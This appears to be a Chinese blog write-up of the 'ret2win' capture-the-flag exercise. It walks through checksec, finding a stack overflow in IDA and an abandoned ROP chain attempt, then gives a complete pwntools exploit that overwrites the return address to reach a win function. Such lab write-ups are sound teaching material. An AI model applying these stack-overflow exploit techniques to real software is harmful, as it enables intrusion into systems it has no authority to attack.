本文详细介绍了通过ida分析程序的栈溢出漏洞,探讨了开启NX保护下的exploit构造,特别是如何利用system和bin字符串进行攻击尝试。然而,由于部分RELRO的存在和栈地址的不可获取,作者最初的方法未能成功。最终,作者发现了已存在的利用电梯,调整策略,构造了有效的payload,成功触发了ret2win。文章展示了从逆向到实战的完整过程,对于理解栈溢出漏洞利用具有指导意义。
checksec一下发现就开了nx
ida打开
栈溢出很明显
shift+f12看看有啥利用的
给的相当丰富,system,bin字符串给全了。笔者当时直接摧枯拉朽pop rdi ret自己构造去了,但是无法出现flag,其实忽略了一个问题,read有0x38,s距rbp有20h,可利用只有24个字节,8字节占用rbp,rdi ret+bin+system有24字节。程序开了partial relro,也没puts栈地址,栈迁移放弃。
再次把目光看向左边,发现
人家其实都造好电梯了,咱还飞檐走壁,好蠢,噗
完整exp
from pwn import *
p = process('./ret2win')
payload=b"a" * 0x28+p64(0x0000000000400756)
p.recvuntil(b"> ")
p.sendline(payload)
p.interactive()
扫一扫
1295
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
